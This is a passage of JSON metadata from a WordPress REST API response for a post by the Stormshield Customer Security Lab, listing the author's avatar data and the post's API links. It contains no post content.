Lab","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/46b9416c400398c1a9fc878c7a35bd2ae4f79caeeda138facd5cb65a4ab91c5d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/46b9416c400398c1a9fc878c7a35bd2ae4f79caeeda138facd5cb65a4ab91c5d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/46b9416c400398c1a9fc878c7a35bd2ae4f79caeeda138facd5cb65a4ab91c5d?s=96&d=mm&r=g","caption":"Stormshield Customer Security Lab"}}]}},"_links":{"self":[{"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/posts\/773972","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/users\/83"}],"replies":[{"embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/comments?post=773972"}],"version-history":[{"count":19,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/posts\/773972\/revisions"}],"predecessor-version":[{"id":773979,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/posts\/773972\/revisions\/773979"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/media\/774044"}],"wp:attachment":[{"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/media?parent=773972"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/categories?post=773972"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/tags?post=773972"},{"taxonomy":"business_size","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/business_size?post=773972"},{"taxonomy":"industry","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/industry?post=773972"},{"taxonomy":"help_mefind","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/help_mefind?post=773972"},{"taxonomy":"features","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/features?post=773972"},{"taxonomy":"type_security","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/type_security?post=773972"},{"taxonomy":"maintenance","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/maintenance?post=773972"},{"taxonomy":"offer","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/offer?post=773972"},{"taxonomy":"administration_tools","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/administration_tools?post=773972"},{"taxonomy":"cloud_offers","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/cloud_offers?post=773972"},{"taxonomy":"listing_product","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/listing_product?post=773972"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}